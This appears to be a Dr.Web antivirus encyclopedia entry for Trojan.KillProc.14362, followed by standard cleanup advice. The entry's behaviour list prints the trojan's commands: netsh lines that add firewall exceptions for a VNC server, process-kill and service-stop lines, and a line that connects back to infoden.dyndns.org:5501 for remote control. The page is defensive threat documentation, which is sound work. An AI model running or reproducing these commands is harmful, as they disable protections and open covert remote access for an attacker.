Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.KillProc.14362

Добавлен в вирусную базу Dr.Web: 2012-01-19

Описание добавлено:

Техническая информация

Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\nsx3.tmp\winvncsc.exe' = '%TEMP%\nsx3.tmp\winvncsc.exe:*:Enabled:OneClick-Server'
Создает и запускает на исполнение:
  • %TEMP%\nsy6.tmp\ns10.tmp "netsh.exe" firewall add allowedprogram "%TEMP%\nsx3.tmp\winvncsc.exe" "OneClick-Server" ENABLE ALL
  • %TEMP%\nsy6.tmp\nsF.tmp "taskkill.exe" /F /IM AvncMenu.exe /T
  • %TEMP%\nsy6.tmp\nsE.tmp "taskkill.exe" /F /IM WinVncSC.exe /T
  • %TEMP%\nsy6.tmp\ns11.tmp "netsh.exe" firewall add allowedprogram "%TEMP%\nsx3.tmp\winvnc.exe.exe" "OneClick-Server" ENABLE
  • %TEMP%\nsx3.tmp\winvncsc.exe -sc_exit -autoreconnect -sc_prompt -connect infoden.dyndns.org::5501 -run
  • %TEMP%\nsy6.tmp\ns12.tmp "%TEMP%\nsx3.tmp\WinVncSC.exe" -sc_exit -autoreconnect -sc_prompt -connect infoden.dyndns.org::5501 -run
  • %TEMP%\nsx3.tmp\1Click.exe 
  • %TEMP%\nsy6.tmp\nsD.tmp "taskkill.exe" /F /IM 1click.exe /T
  • %TEMP%\nsy6.tmp\ns8.tmp "net.exe" stop WinVNC
  • %TEMP%\nsy6.tmp\ns7.tmp "net.exe" stop uvnc_service
  • %TEMP%\nsx3.tmp\WebGetD.exe /3 -plugin -connect infoden.dyndns.org:5501 -noregistry
  • %TEMP%\nsy6.tmp\ns9.tmp "net.exe" stop WinVNC4
  • %TEMP%\nsy6.tmp\nsC.tmp "tskill.exe" AvncMenu
  • %TEMP%\nsy6.tmp\nsB.tmp "tskill.exe" 1click
  • %TEMP%\nsy6.tmp\nsA.tmp "tskill.exe" WinVncSC
Запускает на исполнение:
  • <SYSTEM32>\taskkill.exe /F /IM 1click.exe /T
  • <SYSTEM32>\tskill.exe AvncMenu
  • <SYSTEM32>\tskill.exe 1click
  • <SYSTEM32>\taskkill.exe /F /IM WinVncSC.exe /T
  • <SYSTEM32>\netsh.exe firewall add allowedprogram "%TEMP%\nsx3.tmp\winvnc.exe.exe" "OneClick-Server" ENABLE
  • <SYSTEM32>\netsh.exe firewall add allowedprogram "%TEMP%\nsx3.tmp\winvncsc.exe" "OneClick-Server" ENABLE ALL
  • <SYSTEM32>\taskkill.exe /F /IM AvncMenu.exe /T
  • <SYSTEM32>\net.exe stop WinVNC
  • <SYSTEM32>\net1.exe stop uvnc_service
  • <SYSTEM32>\net.exe stop uvnc_service
  • <SYSTEM32>\net1.exe stop WinVNC
  • <SYSTEM32>\tskill.exe WinVncSC
  • <SYSTEM32>\net1.exe stop WinVNC4
  • <SYSTEM32>\net.exe stop WinVNC4
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\nsy6.tmp\ns9.tmp
  • %TEMP%\nsy6.tmp\ns8.tmp
  • %TEMP%\nsy6.tmp\nsA.tmp
  • %TEMP%\nsy6.tmp\nsC.tmp
  • %TEMP%\nsy6.tmp\nsB.tmp
  • %TEMP%\nsy6.tmp\Splash.dll
  • %TEMP%\nsy6.tmp\default.bmp
  • %TEMP%\nsx3.tmp\rePaper.exe
  • %TEMP%\nsy6.tmp\ns7.tmp
  • %TEMP%\nsy6.tmp\nsExec.dll
  • %TEMP%\nsy6.tmp\nsD.tmp
  • %ALLUSERSPROFILE%\Start Menu\Tools.url
  • %TEMP%\nsy6.tmp\ns11.tmp
  • %HOMEPATH%\Start Menu\Stop Remote Support.lnk
  • %TEMP%\nsy6.tmp\ns12.tmp
  • %HOMEPATH%\Start Menu\1cToolBox.lnk
  • %TEMP%\nsy6.tmp\nsF.tmp
  • %TEMP%\nsy6.tmp\nsE.tmp
  • %TEMP%\nsx3.tmp\Uninst.exe
  • %TEMP%\nsy6.tmp\ns10.tmp
  • %TEMP%\nsx3.tmp\logo.bmp
  • %TEMP%\nsx3.tmp\Splash.bmp
  • %TEMP%\nsx3.tmp\background.bmp
  • %TEMP%\nsx3.tmp\icon2.ico
  • %TEMP%\nsx3.tmp\icon1.ico
  • %TEMP%\nsx3.tmp\WebGetD.exe
  • %TEMP%\nsb2.tmp
  • %TEMP%\nsx3.tmp\winvncsc.exe
  • %TEMP%\nsx3.tmp\Ding_Dong.wav
  • %TEMP%\nsx3.tmp\UltraVnc.ini
  • %TEMP%\nsx3.tmp\stop.ico
  • %TEMP%\nsx3.tmp\MSRC4Plugin.dsm
  • %TEMP%\nsx3.tmp\1Click.exe
  • %TEMP%\nsx3.tmp\rc4.key
  • %TEMP%\nsx3.tmp\Advantig.Lic
  • %TEMP%\nst5.tmp
  • %TEMP%\nsx3.tmp\Startup.txt
  • %TEMP%\nsx3.tmp\boot.ico
  • %TEMP%\nsx3.tmp\OneClick.ini
  • %TEMP%\nsx3.tmp\Goodbye.vbs
  • %TEMP%\nsx3.tmp\Tools.url
Удаляет следующие файлы:
  • %TEMP%\nsy6.tmp\nsE.tmp
  • %TEMP%\nsy6.tmp\nsD.tmp
  • %TEMP%\nsy6.tmp\nsF.tmp
  • %TEMP%\nsy6.tmp\ns11.tmp
  • %TEMP%\nsy6.tmp\ns10.tmp
  • %TEMP%\nsy6.tmp\nsC.tmp
  • %TEMP%\nsy6.tmp\ns8.tmp
  • %TEMP%\nsy6.tmp\ns7.tmp
  • %TEMP%\nsy6.tmp\ns9.tmp
  • %TEMP%\nsy6.tmp\nsB.tmp
  • %TEMP%\nsy6.tmp\nsA.tmp
Сетевая активность:
Подключается к:
  • 'in####n.dyndns.org':5501
UDP:
  • DNS ASK in####n.dyndns.org
  • '<IP-адрес в локальной сети>':1038
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'WinVNC Tray Icon' WindowName: ''
  • ClassName: '' WindowName: ''
  • ClassName: '#32770' WindowName: ''
  • ClassName: 'SysListView32' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке